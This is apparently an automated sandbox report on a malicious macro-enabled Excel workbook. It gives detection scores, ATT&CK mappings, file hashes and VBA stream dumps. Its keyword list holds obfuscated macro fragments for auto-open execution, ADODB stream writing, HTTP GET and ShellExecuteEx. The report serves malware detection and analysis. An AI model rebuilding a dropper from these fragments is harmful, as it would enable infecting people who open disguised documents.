Analysis Report ORDER SHEET & SPEC.xlsm
Overview
General Information
Detection
Score: | 68 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
No yara matches |
---|
Sigma Overview |
---|
No Sigma rule has matched |
---|
Signature Overview |
---|
- • AV Detection
- • Compliance
- • Software Vulnerabilities
- • Networking
- • System Summary
- • Data Obfuscation
- • Hooking and other Techniques for Hiding and Protection
Click to jump to signature section
AV Detection: |
---|
Multi AV Scanner detection for submitted file |
Source: | ReversingLabs: |
Compliance: |
---|
Uses new MSVCR Dlls |
Source: | File opened: | Jump to behavior |
Source: | Memory has grown: |
Source: | File created: | Jump to behavior |
System Summary: |
---|
Document contains an embedded VBA macro which may execute processes |
Document contains an embedded VBA macro with suspicious strings |
Document contains an embedded VBA with functions possibly related to ADO stream file operations |
Source: | Stream path 'VBA/Module2' : |
Document contains an embedded macro with GUI obfuscation |
Source: | Stream path '\x1Ole10Native' : | ||
Source: | Stream path '\x1Ole10Native' : | ||
Source: | Stream path '\x1Ole10Native' : |
Source: | OLE, VBA macro line: |
Source: | OLE indicator, VBA macros: |
Source: | OLE stream indicators for Word, Excel, PowerPoint, and Visio: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | ReversingLabs: |
Source: | Window detected: |
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: |
Source: | Key opened: | Jump to behavior |
Source: | Static file information: |
Source: | File opened: | Jump to behavior |
Source: | Initial sample: |
Data Obfuscation: |
---|
Document contains an embedded VBA with many string operations indicating source code obfuscation |
Source: | Stream path 'VBA/Module2' : |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting52 | Path Interception | Extra Window Memory Injection1 | Masquerading1 | OS Credential Dumping | File and Directory Discovery1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Ingress Tool Transfer1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Scripting52 | LSASS Memory | System Information Discovery1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Junk Data | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information1 | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Extra Window Memory Injection1 | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | Carrier Billing Fraud |
Thumbnails
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
36% | ReversingLabs | Script-JS.Exploit.Bomber |
No Antivirus matches |
---|
No Antivirus matches |
---|
No Antivirus matches |
---|
No Antivirus matches |
---|
No contacted domains info |
---|
No contacted IP infos |
---|
General Information |
---|
Joe Sandbox Version: | 31.0.0 Emerald |
Analysis ID: | 345832 |
Start date: | 29.01.2021 |
Start time: | 07:30:19 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 10m 6s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | ORDER SHEET & SPEC.xlsm |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of analysed new started processes analysed: | 2 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal68.expl.evad.winXLSM@1/3@0/0 |
Cookbook Comments: |
|
Warnings: | Show All
|
No simulations |
---|
No context |
---|
No context |
---|
No context |
---|
No context |
---|
No context |
---|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 4968 |
Entropy (8bit): | 4.708742590880265 |
Encrypted: | false |
SSDEEP: | 96:sASqUJJJJJJJJJJJJvov1x31jFtlFHtfgJKRfd+/s:sAp3HtHkKRf0s |
MD5: | B59DD20DE3FDC50CD6B3C4BAF9C12DE8 |
SHA1: | 2E33A34FB7E7F15B267D99A4E42A2E50DCE7E3E8 |
SHA-256: | 979DDE2AED02F077C16AE53546C6DF9EED40E8386D6DB6FC36AEE9F966D2CB82 |
SHA-512: | 2C308D6AFB16EA9BA5451F0915BFE9D53A8978ABEB4C8159E688CCA6C40740ACE7931AE2AE9430CB96EC108DC1DB4780545CE0E75405289C09A2BBC1721DAC87 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 359727104 |
Entropy (8bit): | 2.3277392482729477E-4 |
Encrypted: | false |
SSDEEP: | 6:rl91bxctSF2wXItZXhlsGR1gElEqKsZXHg/6l//+KLMQl96hTylNhB4IMtbT:rl3byEF2wXILzsYJl5KyHPD9lL+H |
MD5: | B7B637D36BE89C1F5B18510F489761CD |
SHA1: | E28B85F76B0CAA7BB2184F7A8262A73EAB00B277 |
SHA-256: | AE73B0C415351AA3B1C5453536CFA06C6B6AA714BFB9A83DB958E93540E30507 |
SHA-512: | 056A343637B489D46068EB9F062EFFDBEA37B9C19B73B229CC019A6A71C9D4CD307BB280947610FB37D16BBB029E11B4EA22A80A762CD5561AAE1255A2CAAEBB |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 165 |
Entropy (8bit): | 1.4377382811115937 |
Encrypted: | false |
SSDEEP: | |
MD5: | 797869BB881CFBCDAC2064F92B26E46F |
SHA1: | 61C1B8FBF505956A77E9A79CE74EF5E281B01F4B |
SHA-256: | D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185 |
SHA-512: | 1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D |
Malicious: | true |
Reputation: | high, very likely benign file |
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 1.5021307604050105 |
TrID: |
|
File name: | ORDER SHEET & SPEC.xlsm |
File size: | 2793487 |
MD5: | 7ccf88c0bbe3b29bf19d877c4596a8d4 |
SHA1: | 23f0506d857d38c3cd5354b80afc725b5f034744 |
SHA256: | 7bcd31bd41686c32663c7cabf42b18c50399e3b3b4533fc2ff002d9f2e058813 |
SHA512: | 0ec8f398d9ab943e2e38a086d87d750eccc081fb73c6357319e79fe9f69e66a5566c00ce6d297d0d5fadaa5c04220dcf4d9adea1e0c1f88f335dc1c63797dfdc |
SSDEEP: | 1536:Hhh3S1cLkPROxXYvoYIZCMMV2ZX0nIcjELcE3E:0cCOxtYIEbsX0n98E |
File Content Preview: | PK.........^<R..............$.[Content_Types].xml.. ............|l......|l......|l....U.N.0..#....W..H...,..%...p.I.[.d...=......*Hl....9gf..oZ.............pR.eE....W...[...P.-Dr.8=.?m=...6Vd...f,......`1..`x...d..5_.;....p6.Me..d1.....T....+.vI...w9UE... |
File Icon |
---|
Icon Hash: | e4e2aa8aa4bcbcac |
General | ||
---|---|---|
Document Type: | OpenXML | |
Number of OLE Files: | 4 |
Indicators | |
---|---|
Has Summary Info: | False |
Application Name: | unknown |
Encrypted Document: | False |
Contains Word Document Stream: | |
Contains Workbook/Book Stream: | |
Contains PowerPoint Document Stream: | |
Contains Visio Document Stream: | |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: | True |
Summary | |
---|---|
Author: | |
Last Saved By: | |
Create Time: | 2020-02-01T18:28:07Z |
Last Saved Time: | 2020-02-01T18:32:27Z |
Creating Application: | |
Security: | 0 |
Document Summary | |
---|---|
Thumbnail Scaling Desired: | false |
Contains Dirty Links: | false |
Shared Document: | false |
Changed Hyperlinks: | false |
Application Version: | 12.0000 |
General | |
---|---|
Stream Path: | VBA/Module1 |
VBA File Name: | Module1.bas |
Stream Size: | 740 |
Data ASCII: | . . . . . . . . . * . . . . . . . . . . . . . . . 1 . . . . . . . . . . . . . . . _ b ^ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 01 16 03 00 01 f0 00 00 00 2a 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 31 02 00 00 b5 02 00 00 00 00 00 00 01 00 00 00 5f 62 5e bf 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
Keyword |
---|
Attribute |
VB_Name |
VBA Code |
---|
|
General | |
---|---|
Stream Path: | VBA/Module2 |
VBA File Name: | Module2.bas |
Stream Size: | 119905 |
Data ASCII: | . . . . . . . . . p . . . r . . . N . . . . . . . . . . . . . . . . . . . . . . . _ b . . . . . . . . . . . . . . . . . . . . p . . . . . b . . . . . . E M . . . . . . . . . . . . . . . . . . . . S h e l l E x e c u t e A . . . . . b . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e l l E x e c u t e E x . . S h e l l E x e c u t e E x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 01 16 03 00 03 8e 01 00 00 70 09 00 00 72 01 00 00 4e 02 00 00 ff ff ff ff cb 09 00 00 af 84 01 00 00 00 00 00 01 00 00 00 5f 62 0f b9 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 70 00 00 00 00 00 62 02 20 00 00 00 ff ff 45 4d 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 53 68 65 6c 6c 45 78 65 63 75 74 65 41 00 00 00 00 00 62 02 60 00 00 00 00 00 00 00 00 |
Keyword |
---|
"C:\" |
hournow |
fMask |
"yst" |
adTypeText" |
""ment""" |
Object |
""e"" |
Long) |
Long, |
""(aaax)"") |
""Document""" |
OutputBox("Enter |
Declare |
lpFile |
.cbSize |
xdecd(fnfgnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn, |
mijv.ReadText" |
yehrfjdks |
uuenmdg |
Date, |
""eBody"") |
uytrfghjhfrtyhgf" |
uytrfghjhfrtyhgf, |
""(""" |
"Note" |
"Win" |
OKSFCOVOYPYPOXG |
Serial |
wwityetygehrer |
Append |
""C:\progra"" |
""""\"""" |
SW_SHOWMINIMIZED |
iCounter |
vvfebtrfdhbtrdfg" |
Execute(""Se"" |
""Re""" |
total |
""exec |
novarue" |
bgfcvbhgfd" |
"ell" |
""Docu"" |
""Path(""" |
""Ms""" |
"properties" |
SHELLEXECUTEINFO |
"fnfgnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn |
Execute(""l=m"") |
vvfebtrfdhbtrdfg |
nvceuwkbfweu |
""(aaax)""" |
highlightSpecificValues() |
xiocyrftreubg |
""ReadText"") |
cbSize |
""Cr""" |
objFSO.Folder"" |
DatePart("w", |
cobvar |
objFSO, |
""Object""" |
"mijv.Close" |
vbNormal |
Variant |
""bject"" |
""Open |
""ba""" |
Worksheet |
""ieeeeeeeeehhhhhfgfg |
Alias |
Value |
lpDirectory |
""spons""" |
xcbhnjftr |
While |
vcvxcv |
Const |
Hour(Time()) |
""eateObject"" |
""W""" |
""\program""" |
Len(Prop) |
""ob""" |
Resume |
then" |
ForReading |
""ite |
wwityetygehrer" |
""ipt.""" |
.fMask |
Execute |
bgfcvbhgfd |
InputBox("Enter |
iWorksheet |
""(cobvar) |
Execute(""gtyjnhjkfirejhrrhy=dfgerge:uytrfghjhfrtyhgf=vcvxcv"") |
"cftcfrfcfrfcfr |
mijv.Type |
difudteje |
oFile |
Right(varforell, |
String, |
String) |
"ogramd" |
""Open"") |
hInstApp |
"".""" |
nvslsois |
""stream_obj."" |
mijv.CharSet |
ForWriting |
"....." |
fnGetPropDlg |
""gtyjnhjkfirejhrrhy, |
""Set"" |
""(l)""" |
hyuifiuygwhjekriu" |
""Se"" |
""Delete""" |
""Node""" |
Execute(""strFile"" |
""eob""" |
""later"" |
""Exists(path)"")" |
Left( |
Left(mddjekfr, |
""Wr"" |
ByVal |
strMsg" |
""Set |
doesn't |
hhyvbvdtxct |
ShellExecuteEx |
lpVerb |
"".D""" |
"mijv.Position |
""Exists(uytrfghjhfrtyhgf)"")" |
ShellExecuteEx(Prop) |
""""GET"""", |
obvrva |
nShow |
""ADODB"" |
"":""" |
""FileSystemObject""" |
VB_Name |
""Scr""" |
SW_SHOW |
mijv."" |
apfjebdlofe" |
""."" |
SW_SHOWMAXIMIZED |
Execute(""stream_obj."" |
""ieeeeeeeeehhhhhfgfg"" |
""Exists( |
KillFile, |
""InS"" |
Highlight") |
objFile, |
""Cr"" |
"mijv.CharSet |
mluytgfdb)" |
xdecd( |
ActiveSheet.UsedRange |
path" |
dieueehniv |
""tof"" |
Numbers") |
#Else |
""save""" |
"\asc" |
adTypeBinary |
strFilepath |
Public |
"Else" |
""M""" |
varforell |
CStr(ieeeeeeeeehhhhhfgfg)" |
ForAppending |
""ta\"" |
fgwrfguery |
""ct""" |
"Execute(""fnfgnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn |
""later""" |
"dieueehniv |
cftcfrfcfrfcfr, |
""ile |
fso."" |
"")""" |
Right(KillFile, |
xxxxxpath |
LCase(vvfebtrfdhbtrdfg) |
lsksjegefectvvjdk"" |
nShowCmd |
lpClass |
bbbmap |
""run |
dwHotKey |
""kk""" |
ShxllExxcute |
hProcess |
.lpVerb |
""C""" |
""write"" |
""ateO"" |
""OM""" |
"ata" |
SetAttr |
RetVal |
""Stream"" |
lpParameters |
""/""" |
SW_SHOWMINIMIZED) |
""Cre"" |
"txt" |
worksheet." |
rng.Style |
Execute(""hdlkvgbfndm |
""Sh""" |
""File"" |
Len(Dir$(KillFile)) |
KillFile |
"dows\" |
"Execute(""mijv."" |
""xm""" |
stream_obj |
Properties |
""mijv.Type |
""""data\asc"""" |
""Ele""" |
""type |
lsksjegefectvvjdk.DataType |
""open"" |
lpIDList |
""ate""" |
""ux"""")""" |
hIcon |
stream_obj" |
""""""""" |
.hwnd |
lsksjegefectvvjdk |
"mijv.Type |
""m""" |
""""txt"""""")" |
If(ggfffffffffggggggg) |
vbCrLf |
fnfgnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn" |
mkggbetyuryjw |
Execute(""gybghbgyh |
fnGetPropDlg(strFilepath |
gtyjnhjkfirejhrrhy, |
"Enter |
.lpFile |
""eate""" |
""File(path)""" |
strFile |
""cre""" |
Then" |
Auto_Open() |
""in.""" |
""da"" |
exists.""" |
BHEOASEPJWDXYVVBEQYLDLQEMWMYCSLMJHI |
""Scripting."" |
"*Window*" |
almvar |
vbMonday) |
""(""""a""" |
"ipt" |
""""TypedValue""""""" |
"scr" |
If(gybghbgyh) |
PtrSafe |
"call |
""Build"" |
hkeyClass |
"There |
lpOperation |
SHELLEXECUTEINFO) |
False""" |
""trRev"" |
""str""" |
strFile, |
""(ado)""" |
""s""" |
nyjstfhtyjyt |
""""" |
""je""" |
String |
slashy |
""novarue |
juvejrdugey |
uuenmdg" |
""""."""" |
(ByVal |
Range |
vvfebtrfdhbtrdfg, |
exist.""" |
"mancan |
Execute(""ggfffffffffggggggg |
""creat""" |
""l""" |
objFSO |
dfgerge, |
mijv.Close" |
"apfjebdlofe |
""Open:mijv.Wr"" |
Integer |
'---------- |
"open", |
objFSO""" |
""nd""" |
ieeeeeeeeehhhhhfgfg""" |
lsksjegefectvvjdk.Text |
Error |
Value", |
Attribute |
nvceuwkbfweu" |
brjysrjynryyyyyyyyf |
Application.OperatingSystem |
Close |
MsgBox |
""set |
yyyyvar |
ElseIf(hdlkvgbfndm) |
"Execute(""ca"" |
mluytgfdb |
juvejrdugey" |
nvslsois) |
mddjekfr |
ieeeeeeeeehhhhhfgfg"")" |
"ShellExecuteA" |
Function |
""O"" |
""b""" |
""Create""" |
mijv.Position |
mancan" |
Execute(""fso."" |
novarue |
Execute(""path |
Else" |
lsksjegefectvvjdk."" |
Private |
VBA Code |
---|
|
General | |
---|---|
Stream Path: | VBA/Sheet1 |
VBA File Name: | Sheet1.cls |
Stream Size: | 991 |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . _ b . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 5f 62 9c a9 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
Keyword |
---|
False |
VB_Exposed |
Attribute |
VB_Name |
VB_Creatable |
VB_PredeclaredId |
VB_GlobalNameSpace |
VB_Base |
VB_Customizable |
VB_TemplateDerived |
VBA Code |
---|
|
General | |
---|---|
Stream Path: | VBA/Sheet2 |
VBA File Name: | Sheet2.cls |
Stream Size: | 991 |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . _ b . 0 . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 5f 62 8c 30 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
Keyword |
---|
False |
VB_Exposed |
Attribute |
VB_Name |
VB_Creatable |
VB_PredeclaredId |
VB_GlobalNameSpace |
VB_Base |
VB_Customizable |
VB_TemplateDerived |
VBA Code |
---|
|
General | |
---|---|
Stream Path: | VBA/Sheet3 |
VBA File Name: | Sheet3.cls |
Stream Size: | 991 |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . _ b ; . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 5f 62 3b f5 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
Keyword |
---|
False |
VB_Exposed |
Attribute |
VB_Name |
VB_Creatable |
VB_PredeclaredId |
VB_GlobalNameSpace |
VB_Base |
VB_Customizable |
VB_TemplateDerived |
VBA Code |
---|
|
General | |
---|---|
Stream Path: | VBA/Sheet4 |
VBA File Name: | Sheet4.cls |
Stream Size: | 991 |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . _ b . / . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 5f 62 ee 2f 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
Keyword |
---|
False |
VB_Exposed |
Attribute |
VB_Name |
VB_Creatable |
VB_PredeclaredId |
VB_GlobalNameSpace |
VB_Base |
VB_Customizable |
VB_TemplateDerived |
VBA Code |
---|
|
General | |
---|---|
Stream Path: | VBA/ThisWorkbook |
VBA File Name: | ThisWorkbook.cls |
Stream Size: | 999 |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . _ b 3 q . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 5f 62 33 71 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
Keyword |
---|
False |
VB_Exposed |
Attribute |
VB_Name |
VB_Creatable |
"ThisWorkbook" |
VB_PredeclaredId |
VB_GlobalNameSpace |
VB_Base |
VB_Customizable |
VB_TemplateDerived |
VBA Code |
---|
|
General | |
---|---|
Stream Path: | PROJECT |
File Type: | ASCII text, with CRLF line terminators |
Stream Size: | 662 |
Entropy: | 5.20391297771 |
Base64 Encoded: | True |
Data ASCII: | I D = " { A 8 A 8 8 0 6 2 - E A 0 3 - 4 E 0 2 - B A D 3 - 3 5 B C 2 2 0 A A 2 1 6 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 4 / & H 0 0 0 0 0 0 0 0 . . M o d u l e = M o d u l e 1 . . M o d u l e = M o d u l e 2 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = |
Data Raw: | 49 44 3d 22 7b 41 38 41 38 38 30 36 32 2d 45 41 30 33 2d 34 45 30 32 2d 42 41 44 33 2d 33 35 42 43 32 32 30 41 41 32 31 36 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30 |
General | |
---|---|
Stream Path: | PROJECTwm |
File Type: | data |
Stream Size: | 173 |
Entropy: | 3.24541252478 |
Base64 Encoded: | False |
Data ASCII: | T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . S h e e t 4 . S . h . e . e . t . 4 . . . M o d u l e 1 . M . o . d . u . l . e . 1 . . . M o d u l e 2 . M . o . d . u . l . e . 2 . . . . . |
Data Raw: | 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 53 68 65 65 74 34 00 53 00 68 00 65 00 65 00 74 00 34 00 00 00 4d 6f 64 75 6c |
General | |
---|---|
Stream Path: | VBA/_VBA_PROJECT |
File Type: | data |
Stream Size: | 4552 |
Entropy: | 5.06301670883 |
Base64 Encoded: | False |
Data ASCII: | . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 1 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . |
Data Raw: | cc 61 a6 00 00 03 00 ff 09 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fe 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00 |
General | |
---|---|
Stream Path: | VBA/__SRP_0 |
File Type: | data |
Stream Size: | 2283 |
Entropy: | 3.3420581262 |
Base64 Encoded: | False |
Data ASCII: | . K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ P . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . J % . . 9 . . A . . J . . P . A . . . . . . . . |
